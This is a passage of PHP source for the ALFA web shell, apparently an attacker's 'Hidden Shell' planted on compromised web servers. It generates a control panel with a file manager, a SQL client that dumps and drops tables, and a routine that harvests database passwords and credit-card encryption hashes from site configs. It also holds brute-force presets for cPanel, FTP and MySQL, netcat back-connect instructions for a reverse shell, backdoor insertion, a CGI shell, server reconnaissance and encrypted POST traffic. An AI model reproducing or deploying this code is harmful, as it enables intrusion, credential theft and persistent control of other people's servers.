1271var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
1272var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
1273var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
1274var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
1275var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
1276var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
1277var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
1278var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
1279var d = document;
1280var mysql_cache = {};
1281var editor_files = {};
1282var editor_error = true;
1283var editor_current_file = '';
1284var is_minimized = false;
1285var cgi_is_minimized = false;
1286var cgi_lang = '';
1287var upcount = 1;
1288var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
1289var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
1290function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
1291if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
1292if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
1293for($j=1;$j<=10;$j++){
1294echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
1295}
1296echo "
1297if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
1298}";
1299echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong> Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
1300function saveByKey(event){
1301 if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
1302 $("editor_edit_area").onsubmit();
1303 event.preventDefault();
1304 return false;
1305}
1306function setCookie(cname, cvalue, exdays){
1307 var d = new Date();
1308 d.setTime(d.getTime() + (exdays*24*60*60*1000));
1309 var expires = "expires="+ d.toUTCString();
1310 document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
1311}
1312function getCookie(name){
1313 var value = "; " + document.cookie;
1314 var parts = value.split("; " + name + "=");
1315 if (parts.length == 2) return parts.pop().split(";").shift();
1316}
1317function editorClose(pos){
1318 d.body.style.overflow = "visible";
1319 elem = $(pos);
1320 elem.setAttribute("class", "editor-anim-close");
1321 if(pos == "editor"){
1322 is_minimized = false;
1323 }else{
1324 cgi_is_minimized = false;
1325 }
1326 setTimeout(function(){
1327 elem.removeAttribute("class");
1328 elem.style.display = "none";
1329 }, 1000);
1330 d.body.style.overflow = "visible";
1331}
1332function showEditor(pos){
1333 $(pos).setAttribute("class", "editor-anim-show");
1334 $(pos+"-minimized").setAttribute("class", "minimized-hide");
1335 if(pos == "editor"){
1336 is_minimized = false;
1337 if(cgi_is_minimized){
1338 $("cgiloader-minimized").style.top = "30%";
1339 }
1340 }else{
1341 cgi_is_minimized = false;
1342 if(is_minimized){
1343 $("editor-minimized").style.top = "30%";
1344 }
1345 }
1346 d.body.style.overflow = "hidden";
1347}
1348function editorMinimize(pos){
1349 $(pos).setAttribute("class", "editor-anim-minimize");
1350 $(pos+"-minimized").setAttribute("class", "minimized-show");
1351 if(pos == "editor"){
1352 is_minimized = true;
1353 if(cgi_is_minimized){
1354 $("cgiloader-minimized").style.top = "20%";
1355 $("editor-minimized").style.top = "50%";
1356 }else{
1357 $("editor-minimized").style.top = "30%";
1358 }
1359 }else{
1360 cgi_is_minimized = true;
1361 if(is_minimized){
1362 $("cgiloader-minimized").style.top = "20%";
1363 $("editor-minimized").style.top = "50%";
1364 }else{
1365 $("cgiloader-minimized").style.top = "30%";
1366 }
1367 }
1368 d.body.style.overflow = "visible";
1369}
1370function clearEditorHistory(){
1371 var check = confirm("Are u Sure?");
1372 if(check){
1373 for(var i in editor_files){
1374 if(i != editor_current_file){
1375 removeHistory(i);
1376 }
1377 }
1378 }
1379}
1380function editor(file, mode, arg, pwd, file_id, type){
1381 if(type=="dir"&&file=="..")return false;
1382 if(mode == "download"){
1383 g("FilesTools",pwd,file,"download");
1384 return false;
1385 }
1386 var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
1387 file = file.trim();
1388 if(Object.keys(editor_files).length == 0){
1389 var cookie_file = getCookie("alfa_history_files");
1390 try{
1391 editor_files = JSON.parse(cookie_file);
1392 for(var t in editor_files){
1393 insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
1394 }
1395 }catch(e){}
1396 }
1397 if(file.indexOf("/") != -1){
1398 var file_split = file.split("/");
1399 file = file_split[file_split.length - 1];
1400 delete file_split[file_split.length - 1];
1401 cwd = file_split.join("/");
1402 if(islinux){
1403 cwd = "/"+cwd;
1404 }
1405 }
1406 if(typeof type == "undefined"){
1407 type = "";
1408 }
1409 if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
1410 cwd = pwd.trim();
1411 }
1412 try{
1413 for(var i in editor_files){
1414 if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
1415 can_append = false;
1416 file_id = i;
1417 break;
1418 }
1419 }
1420 }catch(e){
1421 console.log(e);
1422 }
1423 editor_error = true;
1424 if(typeof arg != "undefined" && arg.length != 0 && arg != null){
1425 param = alfab64(arg);
1426 }
1427 if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
1428 fid = alfab64(file_id);
1429 pure_fid = file_id;
1430 }else{
1431 var rand_fid = "file_" + getRandom(10);
1432 fid = alfab64(rand_fid);
1433 pure_fid = rand_fid;
1434 }
1435 alfaloader("block");
1436 _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
1437 document.querySelector(".editor-content").innerHTML = e;
1438 $("editor").style.display = "block";
1439 alfaloader("none");
1440 evalJS(e);
1441 if(mode != "delete" && editor_error){
1442 var active = d.getElementsByClassName("is_active");
1443 if(active.length != 0){
1444 active[0].className = "file-holder";
1445 }
1446 fid = pure_fid;
1447 file = decodeURIComponent(file);
1448
1449 if(!editor_files[fid] && can_append){
1450 editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
1451 insertToHistory(fid, file, " is_active", type);
1452 if(mode=="mkfile"){
1453 g("FilesMan",null);
1454 }
1455 }else{
1456 $(fid).parentNode.className += " is_active";
1457 }
1458 }
1459 d.body.style.overflow = "hidden";
1460 d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
1461 if(editor_files[fid]){
1462 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1463 }
1464 editor_current_file = fid;
1465 if(is_minimized){
1466 showEditor("editor");
1467 }
1468 updateCookieEditor();
1469 });
1470 return false;
1471}
1472function insertToHistory(fid, file, mode, type){
1473 var active = "";
1474 if(mode && mode != 0){
1475 active = mode;
1476 }
1477 var NewElement = document.createElement("div");
1478 NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
1479 NewElement.className = "file-holder" + active;
1480 NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
1481 NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
1482 var refNode = d.getElementsByClassName("history-list")[0];
1483 refNode.insertBefore(NewElement, refNode.firstChild);
1484}
1485function loadType(file,type,id){
1486 if(type == "none"){
1487 _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
1488 $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
1489 editor_files[id].type = e;
1490 });
1491 }
1492 var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
1493 if(type == "file"){
1494 type = file.split(".");
1495 type = type[type.length - 1].toLowerCase();
1496 var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
1497 if(types.indexOf(type) == -1){
1498 type = "notfound";
1499 }
1500 }else{
1501 type = "folder";
1502 }
1503 return img.replace("{type}", type + ".png");
1504}
1505function updateDirsEditor(fid, fname){
1506 var current_path = d.mf.c.value + "/";
1507 var oldpath = editor_files[fid].pwd + "/" + fname + "/";
1508 var newpath = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
1509 oldpath = oldpath.replace(/\/\//g, "/");
1510 newpath = newpath.replace(/\/\//g, "/");
1511 current_path = current_path.replace(/\/\//g, "/");
1512 if(current_path.search(oldpath) != -1){
1513 initDir(current_path.replace(oldpath, newpath));
1514 d.mf.c.value = current_path.replace(oldpath, newpath);
1515 _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
1516 }
1517 for(var i in editor_files){
1518 var path = editor_files[i].pwd + "/";
1519 path = path.replace(/\/\//g, "/");
1520 if(path.search(oldpath) != -1){
1521 editor_files[i].pwd = path.replace(oldpath, newpath);
1522 }
1523 }
1524 var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
1525 var reg2 = new RegExp(fname + " \\\|</b></a>");
1526 d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
1527 d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
1528 updateCookieEditor();
1529}
1530function updateCookieEditor(){
1531 setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
1532}
1533function setEditorTitle(fid, mode){
1534 if(mode == "out" && editor_current_file != ""){
1535 fid = editor_current_file;
1536 }
1537 if(editor_files[fid]){
1538 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1539 }
1540}
1541function removeHistory(el){
1542 delete editor_files[el];
1543 if($(el)){
1544 $(el).parentNode.parentNode.removeChild($(el).parentNode);
1545 }
1546 var elm = d.getElementsByClassName("filestools")[0];
1547 if(elm){
1548 if(elm.getAttribute("fid") == el){
1549 elm.outerHTML = "";
1550 }
1551 }
1552 if(editor_current_file == el){
1553 editor_current_file = "";
1554 }
1555 updateCookieEditor();
1556}
1557function getRandom(e){
1558 for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
1559 return t
1560}
1561function reopen(el){
1562 var file_id = el.getAttribute("id")
1563 var pwd = editor_files[file_id].pwd;
1564 var filename = editor_files[file_id].file;
1565 editor(filename, "auto", "", pwd, file_id);
1566}
1567function copyToClipboard(el){
1568 var node = document.getElementById(el);
1569 if(document.selection){
1570 var range = document.body.createTextRange();
1571 range.moveToElementText(document.getElementById(el));
1572 range.select();
1573 document.execCommand("Copy");
1574 alert("text copied");
1575 }else if (window.getSelection()){
1576 var range = document.createRange();
1577 range.selectNode(document.getElementById(el));
1578 window.getSelection().removeAllRanges();
1579 window.getSelection().addRange(range);
1580 document.execCommand("copy");
1581 alert("text copied");
1582 }
1583}
1584function encrypt(str, pwd) {
1585 if (pwd == null || pwd.length <= 0) {
1586 return null;
1587 }
1588 str = alfab64(str, true);
1589 pwd = alfab64(pwd, true);
1590 var enc_chr = "";
1591 var enc_str = "";
1592 var i = 0;
1593 while (i < str.length) {
1594 for (var j = 0; j < pwd.length; j++) {
1595 enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
1596 enc_str += String.fromCharCode(enc_chr);
1597 i++;
1598 if (i >= str.length) break;
1599 }
1600 }
1601 return alfab64(enc_str, true);
1602}
1603function reloadSetting(e){
1604alfaloader("block");
1605_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
1606if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
1607if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
1608return false
1609}
1610function reloadColors(config){
1611 var obj = {};
1612 if(typeof config == "undefined"){
1613 d.querySelectorAll(".colors_input").forEach(function(e){
1614 var id = e.getAttribute("target").replace(".", "");
1615 obj[id] = e.value;
1616 });
1617 }else{
1618 obj = config;
1619 }
1620 alfaloader("block");
1621 var checdk = ($("use_default_color").checked?"1":"0");
1622 _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
1623}
1624function alfab64(a, normal){
1625 if(typeof normal != "undefined" || post_encryption_mode == false){
1626 return window.btoa(unescape(encodeURIComponent(a)));
1627 }
1628 return encrypt(a, "'._AlfaSecretKey().'");
1629}
1630function evalCss(jcss){
1631 var style = document.createElement("style");
1632 if (style.styleSheet) {
1633 style.styleSheet.cssText = jcss;
1634 } else {
1635 style.appendChild(document.createTextNode(jcss));
1636 }
1637 d.getElementsByTagName("head")[0].appendChild(style);
1638}
1639function colorHandlerKey(el){
1640 setTimeout(function(e){
1641 colorHandler(el);
1642 }, 200);
1643}
1644function colorHandler(el){
1645 var target = el.getAttribute("target");
1646 var multi = el.getAttribute("multi");
1647 var ishover = target.indexOf(":hover");
1648 if(multi){
1649 var array = JSON.parse(atob(multi));
1650 var jcss = "";
1651 for(i in array.multi_selector){
1652 jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
1653 }
1654 evalCss(jcss);
1655 }
1656 if(ishover != -1 && !multi){
1657 $("input_" + target.replace(".","")).value = el.value;
1658 $("gui_" + target.replace(".","")).value = el.value;
1659 var css = target+"{color: "+el.value+";}";
1660 evalCss(css);
1661 }else{
1662 $("input_" + target.replace(".","")).value = el.value;
1663 $("gui_" + target.replace(".","")).value = el.value;
1664 if(target == ".header_values"){
1665 target = ".header,.header_values";
1666 }
1667 d.querySelectorAll(target).forEach(function(e){
1668 e.style.color = el.value;
1669 });
1670 }
1671}
1672function importConfig(event){
1673 var input = event.target;
1674 var reader = new FileReader();
1675 reader.onload = function(){
1676 var data = reader.result;
1677 try{
1678 var conf = JSON.parse(data);
1679 reloadColors(conf);
1680 }catch(e){
1681 alert("Config is invalid...!");
1682 }
1683 $("importFileBtn").value = "";
1684 };
1685 reader.readAsText(input.files[0]);
1686}
1687function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
1688function path_history(pos){
1689 _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
1690}
1691function runcgi(lang){
1692 if(cgi_is_minimized && cgi_lang == lang){
1693 showEditor("cgiloader");
1694 return false;
1695 }
1696 _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
1697 d.body.style.overflow = "hidden";
1698 $("cgiloader").style.display = "block";
1699 $("cgiframe").innerHTML = e;
1700 cgi_lang = lang;
1701 if(cgi_is_minimized){
1702 $("cgiloader-minimized").setAttribute("class", "minimized-hide");
1703 setTimeout(function(){
1704 $("cgiloader").removeAttribute("class");
1705 if(is_minimized){
1706 $("editor-minimized").style.top = "30%";
1707 }
1708 }, 1000);
1709 }
1710 });
1711}
1712';
1713echo "</script>
1714<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
1715<input type='hidden' name='a' value='dlfile'>
1716<input type='hidden' name='c' value=''>
1717<input type='hidden' name='file' value=''>
1718</form>
1719<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
1720<img id='a_loader' src='".__showicon('loader')."'>";
1721$cmd_uname = alfaEx("uname -a",false,false);
1722$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
1723if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
1724echo '
1725</head>
1726<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
1727<div id="up_bar"></div>
1728<div class="whole">
1729<form method="post" name="mf" style="display:none;">
1730<input type="hidden" name="a">
1731<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
1732for($s=1;$s<=10;$s++){
1733echo '<input type="hidden" name="alfa'.$s.'">';
1734}
1735echo '<input type="hidden" name="charset">
1736</form>
1737<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
1738<div class="header"><table width="100%" border="0">
1739<tr>
1740<td width="3%"><span class="header_vars">Uname:</span></td>
1741<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
1742</tr>
1743<tr>
1744<td><span class="header_vars">User:</span></td>
1745<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
1746<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
1747</tr>
1748<tr>
1749<td><span class="header_vars">PHP:</span></td>
1750<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
1751</tr>
1752<tr>
1753<td><span class="header_vars">ServerIP:</span></td>
1754<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
1755</tr>
1756<tr>
1757<td width="3%"><span class="header_vars">DateTime:</span></td>
1758<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
1759</tr>
1760<tr>
1761<td><span class="header_vars">Domains:</span></td>
1762<td width="76%"><span class="header_values" id="header_domains">';
1763if($GLOBALS['sys']=='unix'){
1764$d0mains = _alfa_file("/etc/named.conf",false);
1765if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
1766$count=0;
1767foreach($d0mains as $d0main){
1768if(@strstr($d0main,"zone")){
1769preg_match_all('#zone "(.*)"#', $d0main, $domains);
1770flush();
1771if(strlen(trim($domains[1][0])) > 2){
1772flush();
1773$count++;}}}
1774echo "$count Domains";}}
1775else{echo("Cant Read [ /etc/named.conf ]");}
1776echo '</span></td>
1777</tr>
1778<tr>
1779<td height="16"><span class="header_vars">HDD:</span></td>
1780<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1781</tr>';
1782if($GLOBALS['sys']=='unix'){
